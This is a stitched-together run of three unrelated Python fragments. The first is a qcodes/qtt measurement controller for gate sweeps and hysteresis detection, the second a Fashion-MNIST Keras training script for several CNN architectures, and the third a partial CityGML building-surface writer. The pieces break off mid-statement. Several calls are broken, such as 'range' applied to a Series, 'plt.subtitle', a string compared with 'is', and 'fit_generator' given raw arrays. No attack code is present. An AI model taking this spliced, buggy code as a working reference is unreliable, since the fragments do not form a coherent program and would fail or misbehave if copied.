from qtt.automation.measurement_analysis import MeasurementAnalysis
import time
import numpy as np
import scipy.optimize as optimisation
class MeasurementControl(Instrument):
"""
Class that allows for control of measurements.
"""
def __init__(
self,
sample_name: str,
station: object,
datadir: str,
autoanalysis: bool = True, #autoanalysis to be implemented
liveplotting: bool = False,
verbose: bool = True,
**kwargs
):
super().__init__(sample_name+'Control', **kwargs)
qcodes.DataSet.default_io = qcodes.DiskIO(datadir)
self.station = station
self.gates = station.gates
self.autoanalysis = autoanalysis
self.liveplotting = liveplotting
self.verbose = verbose
def scan_1D(self, scan_gate, start, end, step, meas_instr, pause_before_start=None, wait_time=0.02,
abort_controller=None,plot_param=None,sub_plots=None):
''' Used to sweep a gate and measure on some instruments '''
if pause_before_start is not None:
try:
self.gates.set(scan_gate, start)
except:
scan_gate(start)
time.sleep(pause_before_start)
scanjob = scanjob_t({'sweepdata': dict({'param': scan_gate,
'start': start,
'end': end,
'step': step,
'wait_time': wait_time}), 'minstrument': meas_instr})
if abort_controller is not None:
dataset = scan1Dfeedback(self.station, scanjob, location=None, verbose=self.verbose, abort_controller=abort_controller, plotparam=plot_param,subplots=sub_plots)
else:
dataset = scan1D(self.station, scanjob, location=None, verbose=self.verbose, plotparam=plot_param,subplots=sub_plots)
return dataset
def scan_2D(self, sweep_gate, sweep_start, sweep_end, sweep_step, step_gate, step_start, step_end, step_step,
meas_instr, pause_before_start=None, sweep_wait=0.02, step_wait=0.02, plot_param=None):
''' Used to sweep a gate and measure on some instruments '''
if pause_before_start is not None:
try:
self.gates.set(step_gate, step_start)
except:
step_gate(step_start)
time.sleep(pause_before_start)
scanjob = scanjob_t({'sweepdata': dict({'param': sweep_gate,
'start': sweep_start,
'end': sweep_end,
'step': sweep_step,
'wait_time': sweep_wait}),
'stepdata': dict({'param': step_gate,
'start': step_start,
'end': step_end,
'step': step_step,
'wait_time': step_wait}),
'minstrument': meas_instr})
dataset = qtt.measurements.scans.scan2D(self.station, scanjob, plotparam=plot_param)
return dataset
def drift_scan(self, scan_gate, start, end_voltage_list, step, meas_instr, forward_datasets = None,
backward_datasets= None, auto_plot=False, threshold=None):
''' Used to perform 1D sweeps up to increasingly higher voltages to look at drift '''
try:
self.gates.set(scan_gate, start)
except:
scan_gate(start)
time.sleep(0.5)
if forward_datasets is None:
forward_datasets = []
if backward_datasets is None:
backward_datasets = []
MA = MeasurementAnalysis()
for end in end_voltage_list:
dataset_forward = self.scan_1D(scan_gate, start, end, step, meas_instr)
forward_datasets.append(dataset_forward)
dataset_backward = self.scan_1D(scan_gate, end, start, step, meas_instr)
backward_datasets.append(dataset_backward)
if auto_plot:
MA.plot_multiple_scans(forward_datasets,backward_datasets)
MA.plot_drift_scans(forward_datasets,backward_datasets)
if threshold is not None:
forward_max = np.max(MA.forward_diff_list)
backward_max = np.max(MA.backward_diff_list)
if (forward_max>threshold) or (backward_max>threshold):
break # stop the loop when we have entered hysteresis
return forward_datasets, backward_datasets
def find_hysteresis(self, scan_gate, start, end_voltage_list, step, meas_instr, plot_param=None, sub_plots=False, forward_datasets = None,
backward_datasets= None, threshold=None, pause_before_start=0):
''' Used to perform 1D sweeps up to increasingly higher voltages to look at drift '''
try:
self.gates.set(scan_gate, start)
except:
scan_gate(start)
time.sleep(0.5)
if forward_datasets is None:
forward_datasets = []
if backward_datasets is None:
backward_datasets = []
# creating analysis object for each figure. turning off powerpoint generation
SweepAnalysis = MeasurementAnalysis(add_ppts=False)
DriftAnalysis = MeasurementAnalysis(add_ppts=False)
# creating empty hysteresis object
hysteresis_point = None
for end in end_voltage_list:
dataset_forward = self.scan_1D(scan_gate, start, end, step, meas_instr, plot_param=plot_param, sub_plots=sub_plots, pause_before_start=pause_before_start)
forward_datasets.append(dataset_forward)
dataset_backward = self.scan_1D(scan_gate, end, start, step, meas_instr, plot_param=plot_param, sub_plots=sub_plots, pause_before_start=pause_before_start)
backward_datasets.append(dataset_backward)
SweepAnalysis.plot_drift_scans(forward_datasets,backward_datasets,new_fig=False)
SweepAnalysis.fig.canvas.draw()
DriftAnalysis.analyse_drift_scans(forward_datasets,backward_datasets,new_fig=False)
DriftAnalysis.fig.canvas.draw()
if (threshold is not None) and (len(DriftAnalysis.forward_diff_list)>=1):
forward_max = np.max(DriftAnalysis.forward_diff_list)
backward_max = np.max(DriftAnalysis.backward_diff_list)
if (forward_max>threshold) or (backward_max>threshold):
# generate plots
SweepAnalysis.add_ppts = True
DriftAnalysis.add_ppts = True
SweepAnalysis.plot_drift_scans(forward_datasets, backward_datasets, new_fig=False)
DriftAnalysis.analyse_drift_scans(forward_datasets, backward_datasets, new_fig=False)
hysteresis_point = np.max(DriftAnalysis.xvar)
break # stop the loop when we have entered hysteresis
self.forward_datasets = forward_datasets
self.backward_datasets = backward_datasets
return forward_datasets, backward_datasets, hysteresis_point
class FourProbe(qcodes.Parameter):
'''
Qcodes metainstrument that measures four probe resistance or resistivity (for hallbars).
name
Vparam: qcodes parameter for voltage measurement
Iparam: qcodes parameter for current measurement
return_parameter='R': parameter to return. 'R', 'Rho_xx','Rho_xy'
aspect_ratio=None: aspect ratio for hallbar used in Rho_xx
I_threshold=1e-10: current threshold below which it returns 'nan'
'''
def __init__(self, name, Vparam, Iparam, return_parameter='R', aspect_ratio=None, I_threshold=1e-10):
super().__init__(name, label=return_parameter, unit='Ohm')
self.V_param = Vparam
self.I_param = Iparam
self.aspect_ratio = aspect_ratio
self.I_threshold = I_threshold
self.return_parameter = return_parameter
if (return_parameter is 'rho_xx') and (aspect_ratio is None):
raise Exception ('You must set the aspect ratio for rho measurements.')
# you must provide a get method, a set method, or both.
def get_raw(self):
V = self.V_param.get()
I = self.I_param.get()
val = float('nan')
if I > self.I_threshold:
val = V/I
if self.return_parameter.lower() == 'rho_xx':
val = V/I/self.aspect_ratio
return val
class SoftSwitches():
''' Class to control softswitches to switch between measuring accumulation and constrictions.
geometry - ordered list of gate and ohmic names representing their geometric layout '''
def __init__(self, geometry=None, gates=None):
if geometry == None:
raise Exception('Please initialise with a geometry')
self.geometry = geometry
self.gates = gates
self.ohmics = [oo for oo in geometry if oo[0] == 'O']
def set_contacts(self, gate_name):
''' Pass string containing gate name, and the correct Ohmics will automatically be selected. '''
for oo in self.ohmics: # ensures other contacts are open
self.gates.set(oo, 0)
pos = self.geometry.index(gate_name)
# turning on relevant ohmics
self.gates.set(self.geometry[pos - 1], 2000)
self.gates.set(self.geometry[(pos + 1) %len(self.geometry)], 2000)
time.sleep(1) # hard coded 1 second wait to allow switches to settle
class DetermineTurnOn(Instrument):
'''
AbortController object to determine if a measurement should be stopped.
Arguments:
station - current measurement station
meas_par - parameter we are monitoring
threshold - parameter for the method that checks whether to abort
**kwargs - passed to Instrument super init
Method:
check_abort(dataset)
'''
def __init__(self, station, method = None, **kwargs):
super().__init__('Turn_On_Controller', **kwargs)
self.station = station
self.method = method
self.methodkwargs = {'threshold': 0.3e-9}
self.ps = []
def set_params(self, sweep_par, meas_par):
self.sweep_par = sweep_par
self.meas_par = meas_par
def check_abort(self, dataset):
''' Return True if the measurement should be aborted. '''
abort = False
if self.method is None or self.method == 'threshold':
threshold = self.methodkwargs['threshold']
abort = np.nanmax(dataset.arrays[self.meas_par]) > threshold
if self.method == 'gradient':
abort = self.gradient_method(dataset)
return abort
def set_method(self,method, **kwargs):
self.method = method
self.methodkwargs = kwargs
def gradient_method(self,dataset):
abort = False
def linearmodel(x, m, c):
return x * m + c
def linearfit(x, y): # return fit and r squared value
popt, pcov = optimisation.curve_fit(linearmodel, x, y, p0=[0, 0])
residuals = y - linearmodel(x, *popt)
ss_res = np.sum(residuals ** 2)
ss_tot = np.sum((y - np.mean(y)) ** 2)
r_squared = 1 - (ss_res / ss_tot)
return popt, r_squared
y = dataset.arrays[self.meas_par]
y = y[np.isfinite(y)]
x = dataset.arrays[self.sweep_par][:len(y)]
filterwindow = self.methodkwargs['filterwindow']
gradient = self.methodkwargs['gradient']
if len(x) >= filterwindow:
xsub = x[-filterwindow:]
ysub = y[-filterwindow:]
popt, r_sq = linearfit(xsub, ysub)
self.ps.append(popt)
if popt[0] > gradient:
abort = True
else:
abort = False
return abort
class AutomatedMeasurement():
'''
Class to control automated measurements. Should initialise with station, device geometry and measurement method. Bias voltage should be set beforehand.
station - qcodes station object
geometry - list of gate names ordered by their physical location
soft_switches - SoftSwitches object to set the right Ohmics to measure
abort_controller - AbortController object used to determine when gates have turned on
accs - list of accumulation gate names
cons - list of constriction gate names
meas_instr - list of instruments to measure with
'''
def __init__(self,measurement_controller, measurement_analysis, geometry, soft_switches, abort_controller,
accs, cons, meas_instr, bias_voltage=100e-6, step = 5, start = 0, turn_on_ramp = 100, pause_before_start=2):
self.MC = measurement_controller
self.MA = measurement_analysis
self.station = self.MC.station
self.geometry = geometry
self.AC = abort_controller
self.soft_switches = soft_switches
self.cons = cons
self.accs = accs
self.gate_data = {gg: {'turn_on': None,
'hysteresis': None,
'datasets': []
} for gg in accs + cons}
self.meas_instr = meas_instr
self.step = step
self.start = start
self.turn_on_ramp = turn_on_ramp
self.p_b_s = pause_before_start
def measure_sample(self, safe_gate_voltage = 600, max_voltage = 1000, gate_increment = 100, con_offset = 200,
hysteresis_target = 1200):
''' Runs measurement procedure on sample. '''
self.measure_turn_ons(self.accs, safe_gate_voltage, max_voltage, gate_increment)
# sweep up constrictions to maximum of adjacent transistor turn on + constriction offset
# if adjacent constrictions are not on, use lowest value for other accs then up to max voltage
# moving to | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
IMG_ROWS = 28
IMG_COLS = 28
NUM_CLASSES = 10
VALID_SIZE = 0.2
RANDOM_STATE = 456
np.random.seed(RANDOM_STATE)
PATH = "../data/FashionMNIST"
train_file = os.path.join(PATH, "fashion-mnist_train.csv")
test_file = os.path.join(PATH, "fashion-mnist_test.csv")
train_data = pd.read_csv(train_file)
print("train data:", train_data.shape)
test_data = pd.read_csv(test_file)
print("test data:", test_data.shape)
# Create a dictionary for each type of label
labels = {0 : "T-shirt/top", 1: "Trouser", 2: "Pullover", 3: "Dress", 4: "Coat",
5: "Sandal", 6: "Shirt", 7: "Sneaker", 8: "Bag", 9: "Ankle Boot"}
def get_label_distribution(data, needPlot=False):
label_counts = data['label'].value_counts()
total_samples = len(data)
for i in range(label_counts):
label = labels[label_counts.index[i]]
count = label_counts.values[i]
percent = (count / total_samples) * 100
print("{:<20s}: {} or {}%".format(label, count, percent))
if needPlot:
f, ax = plt.subplot(1,1, figsize=(12,4))
g = sns.countplot(data.label, order=data['label'].value_counts().index)
g.set_title("Number of labels for each class")
for p, label in zip(g.patches, data["label"].value_counts().index):
g.annotate(labels[label], (p.get_x(), p.get_height()+0.1))
plt.show()
def sample_images_data(data):
sample_images = []
sample_labels = []
for k in labels.keys():
samples = data[data['label']==k].head(4)
for j,s in enumerate(samples.values):
img = np.array(samples.iloc[j, 1:]).reshape(IMG_ROWS, IMG_COLS)
sample_images.append(img)
sample_labels.append(samples.iloc[j, 0])
print("Total number of sample images to plot: ", len(sample_images))
return sample_images, sample_labels
def plot_sample_images(data_sample_images, data_sample_labels, cmap="Blues"):
f, ax = plt.subplots(5,8, figsize=(16,10))
for i,img in enumerate(data_sample_images):
ax[i//8, i%8].imshow(img, cmap=cmap)
ax[i//8, i%8].axis('off')
ax[i//8, i%8].set_title(labels[data_sample_labels[i]])
plt.show()
def data_preprocessing(data):
y = pd.get_dummies(data.values[:, 0]).values
num_images = data.shape[0]
x_as_array = data.values[:, 1:]
x_reshape = x_as_array.reshape(num_images, IMG_ROWS, IMG_COLS, 1)
X = x_reshape / 255
return X, y
def plot_count_per_class(yd):
ydf = pd.DataFrame(yd)
f, ax = plt.subplots(1, 1, figsize=(12, 4))
g = sns.countplot(ydf[0], order=np.arange(0, 10))
g.set_title("Number of items for each class")
g.set_xlabel("Category")
for p, label in zip(g.patches, np.arange(0, 10)):
g.annotate(labels[label], (p.get_x(), p.get_height() + 0.1))
plt.show()
def get_count_per_class(yd):
ydf = pd.DataFrame(yd)
# Get the count for each label
label_counts = ydf[0].value_counts()
# Get total number of samples
total_samples = len(yd)
# Count the number of items in each class
for i in range(len(label_counts)):
label = labels[label_counts.index[i]]
count = label_counts.values[i]
percent = (count / total_samples) * 100
print("{:<20s}: {} or {}%".format(label, count, percent))
def plot_train_vlad_curve(history):
# plot training / validation loss & acc
plt.figure(figsize=(14, 5))
plt.subplot(1, 2, 1)
plt.suptitle('Train results', fontsize=10)
plt.xlabel('Number of Epochs')
plt.ylabel('Loss', fontsize=16)
plt.plot(history.history['loss'], color='b', label='Training Loss')
plt.plot(history.history['val_loss'], color='r', label='Validation Loss')
plt.legend(loc='upper right')
plt.subplot(1, 2, 2)
plt.ylabel('Accuracy', fontsize=16)
plt.plot(history.history['acc'], color='green', label='Training Accuracy')
plt.plot(history.history['val_acc'], color='orange', label='Validation Accuracy')
plt.legend(loc='lower right')
plt.show()
#train_sample_images, train_sample_labels = sample_images_data(train_data)
#plot_sample_images(train_sample_images, train_sample_labels, "Greens")
# print("Label distribution in training data:")
# get_label_distribution(train_data, needPlot=True)
X_raw, y_raw = data_preprocessing(train_data)
X_test, y_test = data_preprocessing(test_data)
X_train, X_val, y_train, y_val = train_test_split(X_raw, y_raw, test_size=VALID_SIZE, random_state=RANDOM_STATE)
print("Fashion MNIST train - rows:", X_train.shape[0], " columns:", X_train.shape[1:4])
print("Fashion MNIST valid - rows:", X_val.shape[0], " columns:", X_val.shape[1:4])
print("Fashion MNIST test - rows:", X_test.shape[0], " columns:", X_test.shape[1:4])
print("y_train.shape:", y_train.shape)
print(np.argmax(y_train, axis=1))
#plot_count_per_class(np.argmax(y_train, axis=1))
#get_count_per_class(np.argmax(y_train, axis=1))
needTSNE = False
if needTSNE:
from sklearn.utils import shuffle
tsne_obj = TSNE(n_components=2,
init='pca',
random_state=RANDOM_STATE,
method='barnes_hut',
n_iter=250,
verbose=2)
index_input = list(range(len(X_val)))
index_sample = shuffle(index_input, random_state=RANDOM_STATE)[:1000]
print(index_sample)
X_val_sample = X_val[index_sample]
y_val_sample = y_val[index_sample]
tsne_features = tsne_obj.fit_transform(np.reshape(X_val_sample, [X_val_sample.shape[0], -1]))
obj_categories = ['T-shirt/top','Trouser','Pullover','Dress','Coat','Sandal','Shirt','Sneaker','Bag','Ankle boot']
colors = plt.cm.rainbow(np.linspace(0, 1, 10))
plt.figure(figsize=(10, 10))
for c_group, (c_color, c_label) in enumerate(zip(colors, obj_categories)):
print("c_group:", c_group)
print("c_color:", c_color)
print("c_label:", c_label)
plt.scatter(tsne_features[np.where(y_val_sample == c_group), 0],
tsne_features[np.where(y_val_sample == c_group), 1],
marker='o',
color=c_color,
linewidth='1',
alpha=0.8,
label=c_label)
plt.xlabel('Dimension 1')
plt.ylabel('Dimension 2')
plt.title('t-SNE on Testing Samples')
plt.legend(loc='best')
plt.savefig('clothes-dist.png')
plt.show(block=False)
import keras
#keras.backend.set_image_dim_ordering('th')
from keras.models import Sequential, model_from_json
from keras.layers import Dense, Conv2D, Activation, MaxPool2D, Flatten, Dropout, BatchNormalization
from keras.optimizers import RMSprop, Adam, SGD
from keras.preprocessing.image import ImageDataGenerator
from keras.callbacks import ModelCheckpoint
# data augmentation
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # dimesion reduction
rotation_range=0.1, # randomly rotate image in the range
zoom_range=0.1, # randomly zoom image
width_shift_range=0.1, # randomly shift image horizontally
height_shift_range=0.1, # randomly shift image vertically
horizontal_flip=False, # randomly flip images
vertical_flip=False # randomly flip images
)
datagen.fit(X_train)
#Model
input_shape = [None,28,28,1]
NO_EPOCHS = 50
BATCH_SIZE = 128
#optimizer = RMSprop(lr=.001, rho=0.9, epsilon=1e-08, decay=0.0)
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
#region LeNet
from dlexp.model import lenet
needTrainLenet = False
needTestLenet = False
if needTrainLenet:
lenet.net.build(input_shape)
lenet.net.summary()
lenet.net.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
#checkpoint = ModelCheckpoint(filepath='lenet_model.h5', verbose=1, save_best_only=True)
log_filepath = 'checkpoint/log_lenet'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_lenet.h5'
cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only='True')
cbks = [tb_cb, cp_cb]
#datagen.flow(X_train, y_train, batch_size=BATCH_SIZE)
history = lenet.net.fit_generator(X_train, y_train,
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
#callbacks=[checkpoint]
)
# same model
#model_json = lenet.net.to_json()
#lenet.net.save_weights('lenet_model.h5', save_format='h5')
#lenet.net.load_weights('lenet_model.h5')
lenet.net.save('checkpoint/lenet_model.h5')
#model = tf.keras.models.load_model('lenet_model.h5')
# plot training / validation loss & acc
plt.figure(figsize=(14, 5))
plt.subplot(1, 2, 1)
plt.subtitle('Train results', fontsize=10)
plt.xlabel('Number of Epochs')
plt.ylabel('Loss', fontsize=16)
plt.plot(history.history['loss'], color='b', label='Training Loss')
plt.plot(history.history['val_loss'], color='r', label='Validation Loss')
plt.legend(loc='upper right')
plt.subplot(1, 2, 2)
plt.ylabel('Accuracy', fontsize=16)
plt.plot(history.history['acc'], color='green', label='Training Accuracy')
plt.plot(history.history['val_acc'], color='orange', label='Validation Accuracy')
plt.legend(loc='lower right')
plt.show()
if needTestLenet:
new_model = keras.models.load_model('checkpoint/lenet_model.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('lenet', 100*acc))
#endregion
#region AlexNet
from dlexp.model import alexnet
needTrainAlexNet = False
needTestAlexNet = False
if needTrainAlexNet:
alexnet.net.build(input_shape)
alexnet.net.summary()
alexnet.net.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# checkpoint = ModelCheckpoint(filepath='alexnet_model.h5', verbose=1, save_best_only=True)
log_filepath = 'checkpoint/log_alexnet'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_alexnet.h5'
cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only='True')
cbks = [tb_cb, cp_cb]
history = alexnet.net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
alexnet.net.save('checkpoint/alexnet_model.h5')
# model = tf.keras.models.load_model('alexnet_model.h5')
# plot training / validation loss & acc
plt.figure(figsize=(14, 5))
plt.subplot(1, 2, 1)
plt.suptitle('Train results', fontsize=10)
plt.xlabel('Number of Epochs')
plt.ylabel('Loss', fontsize=16)
plt.plot(history.history['loss'], color='b', label='Training Loss')
plt.plot(history.history['val_loss'], color='r', label='Validation Loss')
plt.legend(loc='upper right')
plt.subplot(1, 2, 2)
plt.ylabel('Accuracy', fontsize=16)
plt.plot(history.history['acc'], color='green', label='Training Accuracy')
plt.plot(history.history['val_acc'], color='orange', label='Validation Accuracy')
plt.legend(loc='lower right')
plt.show()
if needTestAlexNet:
new_model = keras.models.load_model('checkpoint/alexnet_model.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('alexnet', 100*acc))
#endregion
#region NiNet
from dlexp.model import nin
needTrainNin = False
needTestNin = False
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
if needTrainNin:
nin.net.build(input_shape)
nin.net.summary()
nin.net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_nin'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_nin.h5'
cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only='True')
cbks = [tb_cb, cp_cb]
history = nin.net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
nin.net.save('checkpoint/nin_model.h5')
# model = tf.keras.models.load_model('nin_model.h5')
plot_train_vlad_curve(history)
if needTestNin:
new_model = keras.models.load_model('checkpoint/cp_nin.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('nin', 100 * acc))
#endregion
#region VGG
from dlexp.model import vgg
needTrainVGG = False
needTestVGG = False
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
if needTrainVGG:
vgg.net.build(input_shape)
vgg.net.summary()
vgg.net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_vgg'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_vgg.h5'
cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only='True')
cbks = [tb_cb, cp_cb]
history = vgg.net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
vgg.net.save('checkpoint/vgg_model.h5')
# model = tf.keras.models.load_model('vgg_model.h5')
plot_train_vlad_curve(history)
if needTestVGG:
new_model = keras.models.load_model('checkpoint/cp_vgg.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('vgg', 100 * acc))
#endregion
#region Inception
from dlexp.model import inception
needTrainInc = False
needTestInc = False
if needTrainInc:
net = inception.build_net([28,28,1])
net.summary()
optimizer = Adam(lr=.005, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_inception'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_inception.h5'
cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only='True')
cbks = [tb_cb, cp_cb]
history = net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
net.save('checkpoint/inception_model.h5')
# model = tf.keras.models.load_model('nin_model.h5')
plot_train_vlad_curve(history)
if needTestInc:
new_model = keras.models.load_model('checkpoint/cp_inception.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('nin', 100 * acc))
#endregion
#region ResNet
from dlexp.model import resnet
needTrainResnet = False
needTestResnet = False
if needTrainResnet:
net = resnet.build_net([28, 28, 1])
net.summary()
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_resnet'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_resnet.h5'
cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only='True')
cbks = [tb_cb, cp_cb]
history = net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
net.save('checkpoint/resnet_model.h5')
# model = tf.keras.models.load_model('nin_model.h5')
plot_train_vlad_curve(history)
if needTestResnet:
new_model = keras.models.load_model('checkpoint/cp_resnet.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, | |
[]]
ew = [[], [], [], []]
dw[0] = [dList[4][0] + window, dList[4][1], dList[4][2] - window]
dw[1] = [dList[1][0] + window, dList[1][1], dList[1][2] + window]
dw[2] = [dList[2][0] - window, dList[2][1], dList[2][2] + window]
dw[3] = [dList[5][0] - window, dList[5][1], dList[5][2] - window]
ew[0] = [dList[4][0] + window, dList[4][1] + embrasure, dList[4][2] - window]
ew[1] = [dList[1][0] + window, dList[1][1] + embrasure, dList[1][2] + window]
ew[2] = [dList[2][0] - window, dList[2][1] + embrasure, dList[2][2] + window]
ew[3] = [dList[5][0] - window, dList[5][1] + embrasure, dList[5][2] - window]
elif side == 2:
dw = [[], [], [], []]
ew = [[], [], [], []]
dw[0] = [dList[4][0] - window, dList[4][1], dList[4][2] - window]
dw[1] = [dList[1][0] - window, dList[1][1], dList[1][2] + window]
dw[2] = [dList[2][0] + window, dList[2][1], dList[2][2] + window]
dw[3] = [dList[5][0] + window, dList[5][1], dList[5][2] - window]
ew[0] = [dList[4][0] - window, dList[4][1] - embrasure, dList[4][2] - window]
ew[1] = [dList[1][0] - window, dList[1][1] - embrasure, dList[1][2] + window]
ew[2] = [dList[2][0] + window, dList[2][1] - embrasure, dList[2][2] + window]
ew[3] = [dList[5][0] + window, dList[5][1] - embrasure, dList[5][2] - window]
dwring = GMLPointList(dw[0]) + ' ' + GMLPointList(dw[3]) + ' ' + GMLPointList(dw[2]) + ' ' + GMLPointList(dw[1]) + ' ' + GMLPointList(dw[0])
addsurface(skipsm, cs, d4, [dwring])
dw0 = GMLPointList(dw[0]) + ' ' + GMLPointList(dw[1]) + ' ' + GMLPointList(ew[1]) + ' ' + GMLPointList(ew[0]) + ' ' + GMLPointList(dw[0])
dw1 = GMLPointList(dw[1]) + ' ' + GMLPointList(dw[2]) + ' ' + GMLPointList(ew[2]) + ' ' + GMLPointList(ew[1]) + ' ' + GMLPointList(dw[1])
dw2 = GMLPointList(dw[3]) + ' ' + GMLPointList(ew[3]) + ' ' + GMLPointList(ew[2]) + ' ' + GMLPointList(dw[2]) + ' ' + GMLPointList(dw[3])
dw3 = GMLPointList(dw[3]) + ' ' + GMLPointList(dw[0]) + ' ' + GMLPointList(ew[0]) + ' ' + GMLPointList(ew[3]) + ' ' + GMLPointList(dw[3])
ew0 = GMLPointList(ew[0]) + ' ' + GMLPointList(ew[1]) + ' ' + GMLPointList(ew[2]) + ' ' + GMLPointList(ew[3]) + ' ' + GMLPointList(ew[0])
addsurface(skipsm, cs, dw0)
addsurface(skipsm, cs, dw1)
addsurface(skipsm, cs, dw2)
addsurface(skipsm, cs, dw3)
addsurface(skipsm, cs, ew0)
else:
d4 = dListGML[4] + ' ' + dListGML[1] + ' ' + dListGML[2] + ' ' + dListGML[5] + ' ' + dListGML[4]
addsurface(skipsm, cs, d4)
def plainMultiSurface(surfaceMember, coords, interior=None):
"""Adds a polygon to the SurfaceMember."""
Polygon = etree.SubElement(surfaceMember, "{%s}Polygon" % ns_gml)
if ASSIGNID:
Polygon.attrib['{%s}id' % ns_gml] = str(uuid.uuid4())
PolygonExterior = etree.SubElement(Polygon, "{%s}exterior" % ns_gml)
LinearRing = etree.SubElement(PolygonExterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = coords
if interior and interior[0] is not None:
for hole in interior:
PolygonInterior = etree.SubElement(Polygon, "{%s}interior" % ns_gml)
LinearRing = etree.SubElement(PolygonInterior, "{%s}LinearRing" % ns_gml)
posList = etree.SubElement(LinearRing, "{%s}posList" % ns_gml)
posList.text = hole
def multiSurface(bldg, coords, semantics, interior=None, LOD=None, opening=None):
"""
Write a surface with input coordinates.
Input: coordinates of the LinearRing.
Output: CompositeSurface.
"""
boundedBy = etree.SubElement(bldg, "{%s}boundedBy" % ns_bldg)
semanticSurface = etree.SubElement(boundedBy, "{%s}%s" % (ns_bldg, semantics))
if LOD == 3:
